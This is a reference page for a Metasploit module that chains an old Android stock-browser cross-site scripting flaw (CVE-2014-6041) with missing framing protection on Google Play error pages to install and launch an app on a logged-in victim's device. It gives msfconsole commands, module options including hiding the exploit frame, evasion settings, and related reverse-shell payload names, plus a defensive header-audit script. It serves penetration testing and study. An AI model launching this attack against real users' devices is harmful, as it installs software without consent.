Android Browser RCE Through Google Play Store XFO - Metasploit
This page contains detailed information about how to use the auxiliary/admin/android/google_play_store_uxss_xframe_rce Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Android Browser RCE Through Google Play Store XFO
Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
Source code: modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-6041
This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store's web interface fails to enforce an X-Frame-Options: DENY header (XFO) on some error pages, and therefore can be targeted for script injection. As a result, this leads to remote code execution through Google Play's remote installation feature, as any application available on the Google Play store can be installed and launched on the user's device. This module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.
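The second weakness above is a response served without a framing restriction. The following Ruby checker is an added example, not code from the Metasploit module or from this page: it parses a raw HTTP response and reports whether a third-party page could frame it, treating a missing or unrecognised X-Frame-Options header as framable unless a CSP frame-ancestors directive covers it. The sample responses are constructed; error responses are checked exactly like any other, because that is where the gap described above sits.

```ruby
# Parse a raw HTTP/1.1 response (status line + headers) into
# [status_code, headers]; header names are downcased and repeated
# headers are kept as a list so conflicting values can be spotted.
def parse_response(raw)
  head = raw.split(/\r?\n\r?\n/, 2).first
  lines = head.split(/\r?\n/)
  status = lines.shift[/\A\S+\s+(\d{3})/, 1].to_i
  headers = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    name, value = line.split(':', 2)
    next unless value
    headers[name.strip.downcase] << value.strip
  end
  [status, headers]
end

# Returns [:denied | :same_origin | :framable, reason].
# A CSP frame-ancestors directive takes precedence over X-Frame-Options;
# an absent, unrecognised or conflicting XFO value is treated as no protection.
def framing_policy(headers)
  csp = headers['content-security-policy']
          .map { |v| v[/frame-ancestors\s+([^;]+)/i, 1] }.compact
  unless csp.empty?
    sources = csp.first.strip.downcase
    return [:denied, "CSP frame-ancestors 'none'"] if sources == "'none'"
    return [:same_origin, "CSP frame-ancestors 'self'"] if sources == "'self'"
    return [:framable, "CSP frame-ancestors allows #{sources}"]
  end
  xfo = headers['x-frame-options']
  return [:framable, 'no X-Frame-Options or frame-ancestors'] if xfo.empty?
  if xfo.uniq.size > 1
    return [:framable, 'conflicting X-Frame-Options values; browser handling differs']
  end
  case xfo.first.upcase
  when 'DENY' then [:denied, 'X-Frame-Options: DENY']
  when 'SAMEORIGIN' then [:same_origin, 'X-Frame-Options: SAMEORIGIN']
  else [:framable, "unrecognised X-Frame-Options value #{xfo.first.inspect} is ignored"]
  end
end

# Constructed samples: a normal page carrying DENY and an error page without it.
SAMPLE_OK = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-Frame-Options: DENY\r\n\r\n<html>"
SAMPLE_ERROR = "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n<html>Not found"

# Audit one raw response and return a small report hash.
def audit(raw)
  status, headers = parse_response(raw)
  policy, reason = framing_policy(headers)
  { status: status, policy: policy, reason: reason }
end
```

Run `audit` over every status code a site can return, including its error handlers, since a DENY on the 200 page says nothing about the 404 or 500 page.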
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/android/google_play_store_uxss_xframe_rce
msf auxiliary(google_play_store_uxss_xframe_rce) > exploit
Msfconsole Usage
Here is how the admin/android/google_play_store_uxss_xframe_rce auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/android/google_play_store_uxss_xframe_rce
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show info
Name: Android Browser RCE Through Google Play Store XFO
Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rafay Baloch
joev <[email protected]>
Available actions:
Name Description
---- -----------
WebServer Serve exploit via web server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIVITY_NAME com.swlkr.rickrolld/.RickRoll yes The name of the activity in the apk to launch
DETECT_LOGIN true yes Prevents the exploit from running if the user is not logged into Google
HIDE_IFRAME true yes Hide the exploit iframe from the user
PACKAGE_NAME com.swlkr.rickrolld yes The package name of the app on the Google Play store you want to install
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Description:
This module combines two vulnerabilities to achieve remote code
execution on affected Android devices. First, the module exploits
CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability
present in versions of Android's open source stock browser (the AOSP
Browser) prior to 4.4. Second, the Google Play store's web interface
fails to enforce a X-Frame-Options: DENY header (XFO) on some error
pages, and therefore, can be targeted for script injection. As a
result, this leads to remote code execution through Google Play's
remote installation feature, as any application available on the
Google Play store can be installed and launched on the user's
device. This module requires that the user is logged into Google
with a vulnerable browser. To list the activities in an APK, you can
use `aapt dump badging /path/to/app.apk`.
References:
https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
http://1337day.com/exploit/description/22581
OSVDB (110664)
https://nvd.nist.gov/vuln/detail/CVE-2014-6041
Module Options
This is a complete list of options available in the admin/android/google_play_store_uxss_xframe_rce auxiliary module:
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show options
Module options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIVITY_NAME com.swlkr.rickrolld/.RickRoll yes The name of the activity in the apk to launch
DETECT_LOGIN true yes Prevents the exploit from running if the user is not logged into Google
HIDE_IFRAME true yes Hide the exploit iframe from the user
PACKAGE_NAME com.swlkr.rickrolld yes The package name of the app on the Google Play store you want to install
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Serve exploit via web server
Advanced Options
Here is a complete list of advanced options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module:
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show advanced
Module advanced options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/android/google_play_store_uxss_xframe_rce module can do:
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show actions
Auxiliary actions:
Name Description
---- -----------
WebServer Serve exploit via web server
Evasion Options
Here is the full list of possible evasion options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #12949 Merged Pull Request: This fixes broken links to the community.rapid7.com blog
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #4742 Merged Pull Request: Module for R7-2015-02
References
- https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
- http://1337day.com/exploit/description/22581
- OSVDB (110664)
- CVE-2014-6041
See Also
Check also the following modules related to this module:
- auxiliary/gather/android_stock_browser_uxss
- exploit/unix/webapp/google_proxystylesheet_exec
- auxiliary/admin/http/wp_google_maps_sqli
- auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- exploit/unix/webapp/wp_google_document_embedder_exec
- auxiliary/dos/android/android_stock_browser_iframe
- exploit/android/adb/adb_server_exec
- exploit/android/browser/samsung_knox_smdm_url
- exploit/android/browser/stagefright_mp4_tx3g_64bit
- exploit/android/browser/webview_addjavascriptinterface
- exploit/android/fileformat/adobe_reader_pdf_js_interface
- exploit/android/local/binder_uaf
- exploit/android/local/futex_requeue
- exploit/android/local/janus
- exploit/android/local/put_user_vroot
- exploit/android/local/su_exec
- payload/android/meterpreter/reverse_http
- payload/android/meterpreter_reverse_http
- payload/android/meterpreter/reverse_https
- payload/android/meterpreter_reverse_https
- payload/android/meterpreter/reverse_tcp
- payload/android/meterpreter_reverse_tcp
- payload/android/shell/reverse_http
- payload/android/shell/reverse_https
- payload/android/shell/reverse_tcp
- post/android/capture/screen
- post/android/gather/hashdump
- post/android/gather/sub_info
- post/android/gather/wireless_ap
- post/android/local/koffee
- post/android/manage/remove_lock
- post/android/manage/remove_lock_root
Authors
- Rafay Baloch
- joev
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.